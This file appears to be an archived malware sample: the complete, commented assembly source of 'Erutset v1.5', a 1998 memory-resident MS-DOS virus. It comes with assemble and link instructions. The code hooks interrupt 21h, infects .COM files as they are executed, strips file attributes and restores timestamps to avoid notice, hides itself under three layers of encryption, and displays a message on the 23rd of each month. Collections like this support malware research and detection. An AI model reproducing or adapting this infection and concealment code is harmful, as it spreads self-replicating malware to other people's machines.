MalwareSourceCode/MSDOS/E-Index/Virus.MSDOS.Unknown.erutset.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

338 lines
19 KiB
NASM

; ------------------------------------------------------------------------- ;
; Erutset v1.5 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `-------------------| Started: 19/06/98 | Finished: 19/06/98 ;
; `-------------------^------------------- ;
; v1.0 - Memory resident .com appender, infects upon execution | Size: 637 ;
; v1.1 - restores time/date & attributes also infects readonly `---------- ;
; v1.2 - now has a single layer of XOR,NEG,ROR encryption ;
; v1.3 - added a second layer of XOR,NEG,NOT,ROR,ROL encryption ;
; v1.4 - added a third layer of XOR,NEG,NOT,ROR,ROL encryption ;
; v1.5 - added a small payload, prints a string and waits for keypress ;
; ------------------------------------------------------------------------- ;
; --------> Dedicated to the hate of all the '31337 h4x0rs' on IRC <------- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm erutset.asm ;
; to link :::::] tlink /t erutset.obj ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment 'code'
assume cs:code,ds:code ; assign CS and DS to code
org 100h ; this be a .com file
.286 ; needed for pusha/popa
jumps ; save space wasted jumping
blank: db 0e9h,0,0 ; jump to start of code
start: call delta ; push IP on to stack
delta: pop bp ; pop it into bp
sub bp,offset delta ; get the delta offset
decr: jmp once ; jump to once (overwritten)
lea si,[bp+encd] ; load the source index up
mov di,si ; move it into DI
call encr ; decrypt the 1st layer
; --------------------( Start Of 1st Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
encd: lea si,[bp+d_encd] ; load the source index up
mov di,si ; move it into DI again
mov cx,d_encr-d_encd ; # of bytes to decrypt
call d_encr ; decrypt the 2nd layer
; --------------------( Start Of 2nd Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
d_encd: lea si,[bp+t_encd] ; load the source index up
mov di,si ; move it into DI again
mov cx,t_encr-t_encd ; # of bytes to decrypt
call t_encr ; decrypt the 3rd layer
; --------------------( Start Of 3rd Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
t_encd: call pload ; check if payload time
mov ax,0deadh ; check if already resident
int 21h ; if we are, bx = 0deadh now
cmp bx,0deadh ; does bx hold 0deadh ?
je first3 ; we are already resident!
sub word ptr cs:[2],80h ; lower top of PSP mem data
mov ax,cs ; move CS into AX
dec ax ; decrement AX
mov ds,ax ; move AX into DS
sub word ptr ds:[3],80h ; sub 2kb from accessed MCB
xor ax,ax ; xor the value in ax to 0
mov ds,ax ; move that value into DS
sub word ptr ds:[413h],2 ; adjust BIOS data by 2kb
mov ax,word ptr ds:[413h] ; move adjusted BIOS data
mov cl,6 ; load cl with value of 6
shl ax,cl ; multiply BIOS mem by 64
mov es,ax ; move value into ES
push cs ; push value of code segment
pop ds ; into data segment register
xor di,di ; xor value in DI to 0
lea si,[bp+start] ; load the source index
mov cx,finished-start ; # of bytes to load up
rep movsb ; load virus into memory
xor ax,ax ; value in ax to 0
mov ds,ax ; move value into DS
lea ax,isr ; point IVT to new ISR
sub ax,offset start ; subtract start offset
mov bx,es ; move es into bx
cli ; interrupts off
xchg ax,word ptr ds:[84h] ; switch old/new int 21h
xchg bx,word ptr ds:[86h] ; switch old/new int 21h
mov word ptr es:[oi21-offset start],ax ; save the old int 21h
mov word ptr es:[oi21+2-offset start],bx ; save the old int 21h
sti ; interrupts on
push cs cs ; push code segment twice
pop ds es ; into DS and ES registers
first3: lea si,[bp+saved] ; load up the source index
mov di,100h ; load the destination index
push di ; push 100h on to the stack
movsw ; move two bytes now
movsb ; move one byte now
retn ; return control to host
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
isr: pushf ; push all flags
cmp ax,0deadh ; are we testing if resident?
jne exec ; nope, check for execution
mov bx,0deadh ; yup, show them we are here
popf ; pop all flags
iret ; pop cs:ip+flags from stack
exec: pusha ; push all registers
push ds ; push data segment register
push es ; push extra segment register
cmp ah,4bh ; something being executed?
je infect ; yup! infect the file
exit: pop es ; pop ES from the stack
pop ds ; pop DS from the stack
popa ; pop all registers
popf ; pop all flags
old21: db 0eah ; jump to original ISR
oi21 dd ? ; old int 21 goes here
ret ; return from call
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
infect: push bp ; save original delta offset
call tsrdel ; push IP on to stack again
tsrdel: pop bp ; pop it into bp
sub bp,offset tsrdel ; get the 2nd delta offset
push ds ; push DS on to stack
pop es ; pop it into es
mov di,dx ; move file handle into di
mov cx,64 ; 64 byte filename possible
mov al,'.' ; load al with the .
cld ; clear direction flag
repnz scasb ; scan until . is hit
cmp word ptr ds:[di],'OC' ; is the file .CO- ?
jne abort ; not it isn't, abort
cmp word ptr ds:[di+2],'M' ; is the file .--M ?
jne abort ; no it isn't, abort
mov ax,4300h ; get file attributes
int 21h ; get them now
push cx ; push the attributes
push dx ; push the file name
mov ax,4301h ; set file attributes
xor cx,cx ; to no attributes at all
int 21h ; ready for infection
mov ax,3d02h ; open the file read/write
int 21h ; open the file now
xchg bx,ax ; move the file handle
push cs cs ; push CS on to stack twice
pop ds es ; pop it into DS and ES
mov ax,5700h ; get time/date stamps
int 21h ; get them now
push dx ; save the date
push cx ; save the time
mov ah,3fh ; the read function
lea dx,[bp+saved] ; record the bytes here
mov cx,3 ; read first three bytes
int 21h ; first three recorded
mov ax,4202h ; scan to end of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; DX:AX = file size now!
cmp dx,0 ; is the file < 65,535 bytes?
jne close ; way to big, close it up
mov cx,word ptr [bp+saved+1] ; move buffer+1 into cx
add cx,finished-start+3 ; virus size + jump
cmp ax,cx ; compare the two
jz close ; if equal, close it up
sub ax,3 ; get jump to virus body size
mov word ptr [bp+newjump+1],ax ; write as our new jump
mov ax,4200h ; point to start of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; pointing to SOF
mov ah,40h ; write to file
mov cx,3 ; write three bytes
lea dx,[bp+newjump] ; write the jump
int 21h ; jump is written
mov ax,4202h ; point to end of file
xor cx,cx ; xor value of cx to 0
cwd ; likewize for dx
int 21h ; pointing to EOF
lea si,[bp+start] ; load the source index
lea di,[bp+buffer] ; load the destination index
mov cx,finished-start ; # of bytes to put in mem
rep movsb ; load virus into memory
lea di,[bp+t_encd-start+buffer] ; load the source index
mov si,di ; load the destination index
mov cx,t_encr-t_encd ; # of bytes to encrypt
call t_encr ; encrypt the 1st layer
lea si,[bp+d_encd-start+buffer] ; load the source index
mov di,si ; load the destination index
mov cx,d_encr-d_encd ; # of bytes to encrypt
call d_encr ; encrypt the 2nd layer
lea di,[bp+encd-start+buffer] ; load the destination index
mov si,di ; load the source index
mov cx,encr-encd ; # of bytes to encrypt
call encr ; encrypt the 3rd layer
mov ah,40h ; write to file
mov cx,finished-start ; # of bytes to write
lea dx,[bp+buffer] ; write from mem
int 21h ; write the bytes now
close: mov ax,5701h ; set time / date stamps
pop cx ; restore the time
pop dx ; restore the date
int 21h ; time / date is restored
mov ax,4301h ; set file attributes
pop dx ; for this file name
pop cx ; with these attributes
int 21h ; attributes are restored
mov ah,3eh ; close up the file
int 21h ; file is closed
abort: pop bp ; pop original delta offset
jmp exit ; point to original ISR
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
saved db 0cdh,20h,0 ; our saved bytes
newjump db 0e9h,0,0 ; the soon to be jump
pldmsg db '',10,13
db ' Infected with :: Erutset :: coded by KilJaeden of the Codebreakers 1998',10,13,'$'
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
pload: mov ah,2ah ; get system time
int 21h ; get it now
cmp dl,23 ; is it the 23rd?
jne endpld ; nope, end the payload
mov ah,09h ; print a string
lea dx,[bp+pldmsg] ; our message
int 21h ; print our message
mov ah,00h ; wait for keypress
int 16h ; make them see us
endpld: ret ; return from call
; --------------------( End Of 3rd Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
t_encr: lodsb ; load a byte
xor al,0C4h ;-----[1]
ror al,4 ;----[2]
not al ;---[3]
neg al ;--[4]
rol al,4 ;-[5]
neg al ;--[4]
not al ;---[3]
ror al,4 ;----[2]
xor al,0C4h ;-----[1]
stosb ; store a byte
loop t_encr ; do all the bytes
ret ; return from call
; --------------------( End Of 2nd Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
d_encr: lodsb ; load a byte
neg al ;---------[1]
ror al,4 ;--------[2]
not al ;-------[3]
neg al ;------[4]
rol al,4 ;-----[5]
not al ;----[6]
ror al,4 ;---[7]
neg al ;--[8]
xor al,069h ;-[9] encryption/decryption
neg al ;--[8]
ror al,4 ;---[7]
not al ;----[6]
rol al,4 ;-----[5]
neg al ;------[4]
not al ;-------[3]
ror al,4 ;--------[2]
neg al ;---------[1]
stosb ; store the byte
loop d_encr ; do all the bytes
ret ; return from call
; --------------------( End Of 1st Encryption Blanket )-------------------- ;
; ------------------------------------------------------------------------- ;
encr: lodsb ; load a byte
neg al ;---[1]
ror al,4 ;--[2]
xor al,0C4h ;-[3] encryption/decryption
ror al,4 ;--[2]
neg al ;---[1]
stosb ; store the byte
loop encr ; do all the bytes
ret ; return from call
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
buffer: ; save our virus in mem
finished: ; end of the virus
once: lea si,[bp+new] ; load the source index
lea di,[bp+decr] ; load the destination index
movsw ; move two bytes
movsb ; move one byte
jmp t_encd ; jump to encrypted area
new: mov cx,encr-encd ; this replaces the jump
code ends ; end code segment
end blank ; end / where to start
; ------------------------------------------------------------------------- ;
; ---------> How Can You Think Freely In The Shadow Of A Church? <--------- ;
; ------------------------------------------------------------------------- ;